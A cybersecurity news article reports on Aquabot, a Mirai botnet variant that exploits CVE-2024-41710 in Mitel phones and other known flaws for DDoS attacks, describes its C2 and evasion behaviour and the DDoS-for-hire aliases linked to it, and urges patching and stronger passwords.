The cybersecurity landscape faces yet another challenge as a new Mirai botnet variant, dubbed Aquabot, emerges, exploiting vulnerabilities in internet-connected devices. Aquabot targets a medium-severity command injection vulnerability, CVE-2024-41710, present in Mitel phones. This botnet’s purpose is to facilitate distributed denial-of-service (DDoS) attacks. These vulnerabilities affect multiple Mitel phone series including 6800, 6900, and the 6970 Conference Unit, heightening the risk for organizations using these devices. Although Mitel addressed this issue in July 2024, and a proof-of-concept (PoC) exploit was released in August 2024, active exploitation attempts have been detected since January 2025.
Exploitation of Multiple Vulnerabilities
Targeting a Range of Devices
Aquabot doesn’t restrict itself to Mitel phones alone, but also targets other known vulnerabilities including CVE-2018-10561, CVE-2018-10562, CVE-2018-17532, CVE-2022-31137, and CVE-2023-26801. Additionally, it exploits a remote code execution flaw in Linksys E-series devices. The broad scope of Aquabot’s reach indicates a calculated approach by cyber threat actors to compromise as many devices as possible. Mitel 6800 and 6900 series SIP Phones, as well as the 6970 Conference Unit, all exhibit susceptibility to these attacks, leaving many internet-connected devices at significant risk.
Leveraging these vulnerabilities, Aquabot can deploy its malicious activities through various CPU architectures using shell scripts and “wget” commands. A distinctive feature of this variant is its “report_kill” function. It communicates with a command-and-control (C2) server whenever it detects a kill signal on an infected device. Designed to increase the botnet’s survivability, this communication lacks a server response yet reflects sophisticated approaches for stealth and payload delivery. Threat actors responsible for managing Aquabot could potentially interpret these signals for enhancing stealth capabilities and eliminating competing botnets.
Evolution of Aquabot
Akamai researchers have shed light on Aquabot’s purpose of crafting a DDoS network. Introduced in November 2023, this botnet displays ongoing refinements in its structure and behavior. Aquabot renames itself to “httpd.x86” in an effort to blend into the legitimate processes running on an infected device. It terminates processes like local shells, suggesting efforts to avoid detection and indicating evolving trends toward stealthier variants. These traits underscore the continuous need for dynamic and updated security measures against botnets exploiting vulnerabilities in internet-connected devices.
Threat Actors and Misleading Claims
Alleged DDoS Services on Telegram
There is compelling evidence pointing to the possibility that the threat actors behind Aquabot may be offering DDoS services under various aliases. On platforms like Telegram, names such as Cursinq Firewall, The Eye Services, and The Eye Botnet have surfaced. Such aliases indicate an organized effort to monetize the botnet’s capabilities by providing DDoS attack services. Participants may even advertise their botnets openly or boast about their activities, spreading awareness and potentially recruiting additional threat actors to expand their operations.
These activities highlight the ongoing issue where botnets, initially claimed to serve educational or DDoS mitigation testing purposes, end up being used for malicious intent. Analyzing these claims reveals a pattern where botnets are marketed as tools for legitimate testing but are, in reality, means to conduct and advertise DDoS services. This scenario stresses the importance of maintaining vigilance when encountering such claims and advocates for improved educational efforts regarding cybersecurity hygiene and the repercussions of misusing these technologies.
Necessity for Enhanced Security Measures
Considering Aquabot’s potential to affect a wide range of devices, it brings to light the urgency for companies to bolster their security mechanisms. Default configurations and passwords, often exploited by Aquabot to seize control of devices, remain a prevalent issue among internet-of-things (IoT) devices. The emphasis on enforcing stronger password policies and keeping software up-to-date cannot be overstated. Organizations must prioritize securing their devices by mitigating vulnerabilities to prevent them from being co-opted into botnets used for malicious goals such as DDoS attacks.
Conclusion
The cybersecurity landscape is once again under threat with the emergence of a new Mirai botnet variant known as Aquabot. This botnet leverages vulnerabilities in internet-connected devices to operate, specifically targeting a medium-severity command injection flaw, CVE-2024-41710, found in Mitel phones. Aquabot’s primary function is to facilitate distributed denial-of-service (DDoS) attacks. This vulnerability impacts a range of Mitel phone models, including the 6800, 6900, and the 6970 Conference Unit, thus increasing the risk for organizations relying on these devices. Although Mitel addressed and patched this issue in July 2024 and a proof-of-concept (PoC) exploit was published in August 2024, there have been active attempts to exploit this vulnerability since January 2025. The constant evolution of such threats highlights the critical need for organizations to stay updated on security patches and to implement robust cybersecurity measures to protect their systems effectively.
